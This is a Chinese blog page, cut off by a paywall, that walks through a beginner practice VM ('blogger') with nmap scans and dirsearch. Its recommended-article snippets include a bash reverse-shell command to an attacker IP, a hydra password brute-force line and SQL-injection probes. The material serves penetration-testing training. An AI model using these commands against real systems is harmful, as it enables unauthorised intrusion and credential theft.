靶机实战-blogger

blogger靶机实战:从环境搭建到拿flag
最新推荐文章于 2025-07-22 16:08:53 发布
原创 最新推荐文章于 2025-07-22 16:08:53 发布 · 4.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #linux #web安全

靶机实战 - blogger

1 介绍

难度: 初学者

描述:一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。

目标: 拿到flag

2 环境搭建

由于靶机特点,需要搭建在VirtualBox ,所以在启动前配置网卡为桥接模式

  1. 双击 ova 文件导入 virtualBox,然后设置网卡模式

在这里插入图片描述

  1. 配置kali的网卡为 桥接模式

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dAIfyCOY-1649137170556)(靶机实战-blogger.assets/image-20220403222328401.png)]

靶机渗透

攻击机 kali Linux :192.168.31.106

  1. 主机发现

    nmap -sP 192.168.31.0/24 // 采用ping扫描存活主机

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tsSnGZUi-1649137170557)(靶机实战-blogger.assets/image-20220403223314018.png)]

    排除个人IP和已知网络IP后,存在一个异常IP地址: 192.168.31.73

  2. 进一步扫描 IP 地址开放的端口号

    nmap -sV -sT -p- 192.168.31.73 // -sV 探测端口服务版本 -sT 全连接 -p- 全端口

    扫描结束后,发现目标IP 开放了 2 个端口,SSH 可以采用爆破密码, HTTP服务可以通过常规 web 漏洞手段渗透,确认攻击方法后,优先挖掘 web 漏洞

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cPNAdaUf-1649137170558)(靶机实战-blogger.assets/image-20220403223801862.png)]

后续可能会遇到跳转到域名访问情况, 将 blogger.thm 添加到 /etc/hosts 文件 或 C:\Windows\System32\drivers\etc\hosts文件
在这里插入图片描述

  1. web 应用程序- 漏洞发现

    先进行目录爆破,使用工具 dirsearch 爆破路径

    命令: python dirsearch.py -u http://192.168.31.73/

最低0.47元/天 解锁文章
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 1194
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
靶机实战-zico
滕财然的博客
01-19 1332
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到一个有用的: 链接后面有?page= tools.htm...
靶机实战-DC-6
滕财然的博客
03-03 991
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
靶机渗透 blog
Anonymous
03-08 362
端口 访问 80 端口 目录扫描 在 /my_weblog 目录下 访问 README 发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞 需要使用到后台的账号密码 账号爆破 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incor..
靶机实战(billu)
weixin_45605313的博客
06-01 734
billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:billu 测试机:kali,win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1415
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
靶机实战-FristiLeaks
滕财然的博客
01-20 538
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
靶机实战:Funbox10
CHAsichuan的博客
06-14 2438
一次中等难度的靶机超详细版记录
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
靶机实战-Acid
滕财然的博客
01-26 978
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
靶机实战-evilscience
滕财然的博客
01-28 833
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
Vulnhub Noob: 1靶机攻击实战(一)
最新发布
初学者
07-22 977
本文介绍了如何通过靶机Noob.ova进行渗透测试的过程。首先通过arp-scan和nmap扫描获取靶机IP和开放端口(21/FTP、80/HTTP、55077/SSH)。发现FTP存在匿名访问漏洞,获取到Base64编码的账号密码"champ:password",成功登录80端口的网页。通过分析下载的压缩包,利用steghide工具从funny.bmp文件中提取出SSH凭据"wtf:this one is a simple one"。最后使用该凭据登录55077端口
靶机渗透测试实战(一)——熟悉渗透测试流程的简单测试
热门推荐
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3543
Vulnhub-CTF4靶机实战
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 8429
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 965
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
Vulnhub: blogger:1靶机
qq_43884092的博客
08-03 832
wordpress插件任意文件上传漏洞,sudo提权
vulnhub靶机AI-WEB1
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值